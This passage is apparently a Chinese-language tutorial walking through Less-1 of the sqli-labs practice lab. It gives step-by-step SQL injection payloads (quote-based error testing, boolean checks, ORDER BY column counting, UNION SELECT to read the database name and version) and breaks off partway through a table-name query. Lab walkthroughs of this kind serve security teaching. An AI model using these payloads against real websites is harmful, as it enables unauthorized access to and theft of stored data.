sqli-libs
sql注入思路
判读是否存在注入–判断注入类型–猜解字段数–查看输出字段位置–尝试爆出数据
获取数据库名–获取表名–获取列名–获取数据
less–1
页面让我们输入一个id值
我们用get的请求方式输入看看
测试这里是否有注入点
?id=1'
出现报错情况,说明这里有注入点
判断注入类型
?id=1' and 1=1--+
为正常页面
?id=1' and 1=2--+
页面显示不正常
则为,字符型注入
猜测他的查询语句为
select *from * where ID='id' limit 0,1;
查询字段数
?id=1' order by 3--+
当order by 3时,页面正常显示
当order by 4时,页面报错
说明,字段数为3
查看,输出的是哪一位数
?id=-1' union select 1,2,3--+
可以看到,输出的字段为2,3
我们可以是数据在2,3处显示出来
爆数据库名
?id=-1' union select 1,database(),version()--+
数据库名为security,版本为5.5.53
爆表名
?id=-1' union select 1,(select group_